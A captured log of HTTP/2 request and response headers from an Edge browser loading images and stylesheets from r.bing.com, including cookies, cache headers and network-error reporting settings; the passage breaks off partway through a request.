user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/svg+xml
content-md5: ZgHkolq4RyA+EBWzJRSxbA==
last-modified: Wed, 17 Aug 2022 05:43:11 GMT
etag: 0x8DA80135F60E7EB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c9bf6567-601e-001d-4f0a-bfeded000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.c0777b5c.1709162041.36311fc
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=140511
expires: Sat, 02 Mar 2024 06:33:40 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbd0
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/jpeg
content-md5: KZpHmi9/HzDQlUXKjMXRYg==
last-modified: Tue, 27 Dec 2022 02:26:51 GMT
etag: 0x8DAE7B1D074C7E9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6e670bb3-d01e-00d3-3d8a-b53c63000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=360411
expires: Mon, 04 Mar 2024 19:38:40 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbd2
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/jpeg
content-md5: adFid0+JT/i5IDMON2t6Yg==
last-modified: Tue, 27 Dec 2022 02:26:51 GMT
etag: 0x8DAE7B1D074A0DB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 835147a0-201e-0023-094f-ea7a92000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=278754
expires: Sun, 03 Mar 2024 20:57:43 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbd3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/jpeg
content-md5: DEHuMbBOl4tIgtF2kPA6Og==
last-modified: Tue, 27 Dec 2022 02:26:51 GMT
etag: 0x8DAE7B1D074C7E9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c9a154d1-a01e-002d-544f-ea5322000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=241074
expires: Sun, 03 Mar 2024 10:29:43 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbd4
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/95z5wMy4UcfbSSSlSw780vQ5jKA.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/jpeg
content-md5: qYoIvbmbhCLJ3J1v3ZOHww==
last-modified: Tue, 27 Dec 2022 02:26:51 GMT
etag: 0x8DAE7B1D074A0DB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f925a30f-e01e-0085-7d11-09cd8c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=102827
expires: Fri, 01 Mar 2024 20:05:36 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbd5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/jpeg
content-md5: /aLOrgZ5YRk35ucfcBo2qw==
last-modified: Tue, 27 Dec 2022 02:26:51 GMT
etag: 0x8DAE7B1D07452CB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bc3aa526-f01e-00d4-6bc0-9e5000000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=396897
expires: Tue, 05 Mar 2024 05:46:46 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbd6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/ln5TQq6AIWfcBlduDk-5bnaJMpY.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/jpeg
content-md5: eu9Mz25HuboDg2XNPR9Wkw==
last-modified: Tue, 27 Dec 2022 02:26:51 GMT
etag: 0x8DAE7B1D074EEF0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 07767630-001e-0079-32f5-2c1c75000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=140495
expires: Sat, 02 Mar 2024 06:33:24 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbd7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/dbmNS45xQvD1diApY1T2HExvOo8.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/jpeg
content-md5: 9ucNopg0mtlCFfC0podQNw==
last-modified: Tue, 27 Dec 2022 02:26:51 GMT
etag: 0x8DAE7B1D07479D4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d225c54a-501e-0074-349f-04d4a1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4c18dd58.1701876503.5597344f
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=222727
expires: Sun, 03 Mar 2024 05:23:56 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbd9
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/jpeg
content-md5: KBVwYR+JIZqXDyWJ+YoJ2w==
last-modified: Tue, 27 Dec 2022 02:26:51 GMT
etag: 0x8DAE7B1D07452CB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dc4b7bb2-d01e-0027-7c28-37f795000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=330379
expires: Mon, 04 Mar 2024 11:18:08 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbda
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/svg+xml
content-md5: iOPtPdfu4TP3P/udNrBLbw==
last-modified: Wed, 17 Aug 2022 06:03:54 GMT
etag: 0x8DA801644301055
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a81edf47-401e-0068-185a-0386c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=275763
expires: Sun, 03 Mar 2024 20:07:52 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbce
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
ResponseHTTP/2.0 200
content-type: image/svg+xml
content-md5: wEyINKyRgCGG5s5neuSonQ==
last-modified: Wed, 17 Aug 2022 05:50:40 GMT
etag: 0x8DA80146A849396
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 520f348f-201e-0047-3807-642e71000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=69599
expires: Fri, 01 Mar 2024 10:51:48 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626dbd1
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/c4ruj6QGsmSnOG64gJJnnnYDa44.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
ResponseHTTP/2.0 200
content-md5: zul1ioyI5qjKzvVMsqd8eQ==
last-modified: Fri, 03 Feb 2023 20:30:28 GMT
etag: 0x8DB06257D26CE8E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a7acacbf-601e-00f9-5f41-ede373000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 389
cache-control: public, no-transform, max-age=267026
expires: Sun, 03 Mar 2024 17:42:16 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dc7b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/5-y8FBmAkXLBZZghI-X94CRnsqg.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0
cookie: SRCHUSR=DOB=20240229&T=1709220708000
